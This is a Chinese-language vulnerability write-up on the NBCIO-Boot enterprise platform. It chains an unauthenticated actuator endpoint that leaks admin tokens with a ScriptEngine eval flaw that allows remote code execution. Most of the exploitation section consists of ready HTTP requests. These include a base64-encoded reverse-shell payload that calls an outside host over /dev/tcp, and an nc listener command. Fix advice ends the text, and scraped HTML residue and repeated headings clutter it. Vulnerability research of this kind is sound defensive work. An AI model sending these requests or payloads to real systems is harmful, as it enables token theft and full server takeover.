NBCIO-Boot 从信息泄露到Getshell漏洞分析与利用<\/h1>

一、项目简介<\/h2>

NBCIO 亿事达企业管理平台是基于以下技术栈的开源工作流开发平台：<\/p>

后端框架：jeecgboot 3.0<\/li>
工作流引擎：flowable 6.7.2<\/li>
主要功能：流程设计、流程管理、流程执行、任务办理、流程监控<\/li>

附加功能：聊天功能、大屏设计器、网盘功能、项目管理<\/li> <\/ul>

项目地址：https:\/\/gitee.com\/nbacheng\/nbcio-boot<\/p>

二、环境搭建<\/h2>

修改配置文件中的MySQL和Redis连接信息<\/li>

启动项目即可正常运行<\/li> <\/ol>

三、未授权访问漏洞分析<\/h2>

漏洞位置<\/h3>
`org\/jeecg\/config\/shiro\/ShiroConfig.java:156<\/code><\/p>`

漏洞详情<\/h3>
在ShiroConfig配置类中，错误地放开了actuator接口的未授权访问：<\/p>
\/\/ ShiroConfig.java中的配置
<\/span><\/span><\/span>\/\/ 放行了\/actuator\/**路径的访问权限
<\/span><\/span><\/span><\/code><\/pre>利用方式<\/h3>
直接访问\/actuator\/httptrace<\/code>接口可以免认证获取管理员的token信息：<\/p>
GET \/nbcio-boot\/actuator\/httptrace HTTP\/1.1
Host: target.com
<\/code><\/pre>
四、远程代码执行(RCE)漏洞分析<\/h2>
漏洞位置<\/h3>
com\/nbcio\/modules\/estar\/bs\/service\/impl\/DataSetParamServiceImpl.java:99<\/code><\/p>
漏洞详情<\/h3>

代码中直接调用了ScriptEngine的eval方法，未做任何安全处理<\/li>
通过参数注入可以实现任意Java代码执行<\/li>
<\/ol>
漏洞触发路径<\/h3>

反向跟踪发现漏洞位于\/testTransform<\/code>接口<\/li>
前端触发点为"测试预览"功能<\/li>
<\/ol>
漏洞验证POC<\/h3>
POST<\/span> \/nbcio-boot\/bs\/bsDataSet\/testTransform HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> target.com<\/span>
<\/span><\/span>Content-Type:<\/span> application\/json;charset=UTF-8<\/span>
<\/span><\/span>X-Access-Token:<\/span> [获取的管理员token]<\/span>
<\/span><\/span>
<\/span><\/span>{
<\/span><\/span>  "sourceCode"<\/span>:"mysql"<\/span>,
<\/span><\/span>  "dynSentence"<\/span>:"select * from bs_report_barstack"<\/span>,
<\/span><\/span>  "dataSetParamDtoList"<\/span>:[
<\/span><\/span>    {
<\/span><\/span>      "paramName"<\/span>:""<\/span>,
<\/span><\/span>      "paramDesc"<\/span>:""<\/span>,
<\/span><\/span>      "paramType"<\/span>:""<\/span>,
<\/span><\/span>      "sampleItem"<\/span>:""<\/span>,
<\/span><\/span>      "mandatory"<\/span>:true<\/span>,
<\/span><\/span>      "requiredFlag"<\/span>:1<\/span>,
<\/span><\/span>      "validationRules"<\/span>:"java.lang.Runtime.getRuntime().exec('calc');"<\/span>
<\/span><\/span>    }
<\/span><\/span>  ],
<\/span><\/span>  "dataSetTransformDtoList"<\/span>:[
<\/span><\/span>    {
<\/span><\/span>      "transformType"<\/span>:"js"<\/span>,
<\/span><\/span>      "transformScript"<\/span>:""<\/span>
<\/span><\/span>    }
<\/span><\/span>  ],
<\/span><\/span>  "setType"<\/span>:"sql"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>五、完整漏洞利用实战<\/h2>
步骤1：获取管理员认证信息<\/h3>
GET<\/span> \/nbcio-boot\/actuator\/httptrace HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> target.com<\/span>
<\/span><\/span><\/code><\/pre>从响应中提取X-Access-Token字段的值。<\/p>
步骤2：准备反弹Shell监听<\/h3>
在Kali Linux上执行：<\/p>
nc -lvnp 7777<\/span>
<\/span><\/span><\/code><\/pre>步骤3：构造并发送反弹Shell的POC<\/h3>
POST<\/span> \/nbcio-boot\/bs\/bsDataSet\/testTransform HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> target.com<\/span>
<\/span><\/span>Content-Type:<\/span> application\/json;charset=UTF-8<\/span>
<\/span><\/span>X-Access-Token:<\/span> [获取的管理员token]<\/span>
<\/span><\/span>
<\/span><\/span>{
<\/span><\/span>  "sourceCode"<\/span>:"mysql"<\/span>,
<\/span><\/span>  "dynSentence"<\/span>:"select * from bs_report_barstack"<\/span>,
<\/span><\/span>  "dataSetParamDtoList"<\/span>:[
<\/span><\/span>    {
<\/span><\/span>      "paramName"<\/span>:""<\/span>,
<\/span><\/span>      "paramDesc"<\/span>:""<\/span>,
<\/span><\/span>      "paramType"<\/span>:""<\/span>,
<\/span><\/span>      "sampleItem"<\/span>:""<\/span>,
<\/span><\/span>      "mandatory"<\/span>:true<\/span>,
<\/span><\/span>      "requiredFlag"<\/span>:1<\/span>,
<\/span><\/span>      "validationRules"<\/span>:"java.lang.Runtime.getRuntime().exec(\"bash -c {echo,YmFzaCAtaT4mIC9kZXYvdGNwLzZ2NzI4NzAyZjYuemljcC5mdW4vNTMyNjcgMD4mMQ==}|{base64,-d}|{bash,-i}\");"<\/span>
<\/span><\/span>    }
<\/span><\/span>  ],
<\/span><\/span>  "dataSetTransformDtoList"<\/span>:[
<\/span><\/span>    {
<\/span><\/span>      "transformType"<\/span>:"js"<\/span>,
<\/span><\/span>      "transformScript"<\/span>:""<\/span>
<\/span><\/span>    }
<\/span><\/span>  ],
<\/span><\/span>  "setType"<\/span>:"sql"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>其中YmFzaCAtaT4mIC9kZXYvdGNwLzZ2NzI4NzAyZjYuemljcC5mdW4vNTMyNjcgMD4mMQ==<\/code>是base64编码的反弹shell命令：<\/p>
bash -i >& \/dev\/tcp\/6v728702f6.zicp.fun\/53267 0>&1<\/span>
<\/span><\/span><\/code><\/pre>步骤4：获取Shell<\/h3>
成功执行后，攻击机的nc监听端口将获得目标系统的shell权限。<\/p>
六、漏洞修复建议<\/h2>


Actuator接口访问控制<\/strong>：<\/p>

限制\/actuator接口的访问权限<\/li>
配置身份验证和授权<\/li>
<\/ul>
<\/li>

ScriptEngine安全使用<\/strong>：<\/p>

避免直接执行用户输入的代码<\/li>
使用白名单限制可执行的操作<\/li>
实现沙箱环境隔离<\/li>
<\/ul>
<\/li>

输入验证<\/strong>：<\/p>

对所有输入参数进行严格验证<\/li>
过滤特殊字符和危险操作<\/li>
<\/ul>
<\/li>

最小权限原则<\/strong>：<\/p>

应用程序应使用最小必要权限运行<\/li>
限制系统命令执行能力<\/li>
<\/ul>
<\/li>

安全审计<\/strong>：<\/p>

定期进行代码安全审计<\/li>
使用静态代码分析工具检测潜在漏洞<\/li>
<\/ul>
<\/li>
<\/ol>

NBCIO-Boot 从信息泄露到Getshell漏洞分析与利用<\/h1>

三、未授权访问漏洞分析<\/h2>

漏洞位置<\/h3> org\/jeecg\/config\/shiro\/ShiroConfig.java:156<\/code><\/p>

四、远程代码执行(RCE)漏洞分析<\/h2>

漏洞位置<\/h3> com\/nbcio\/modules\/estar\/bs\/service\/impl\/DataSetParamServiceImpl.java:99<\/code><\/p>

五、完整漏洞利用实战<\/h2>

步骤4：获取Shell<\/h3> 成功执行后，攻击机的nc监听端口将获得目标系统的shell权限。<\/p>

漏洞位置<\/h3>
`org\/jeecg\/config\/shiro\/ShiroConfig.java:156<\/code><\/p>`

漏洞位置<\/h3>
`com\/nbcio\/modules\/estar\/bs\/service\/impl\/DataSetParamServiceImpl.java:99<\/code><\/p>`

步骤4：获取Shell<\/h3>
成功执行后，攻击机的nc监听端口将获得目标系统的shell权限。<\/p>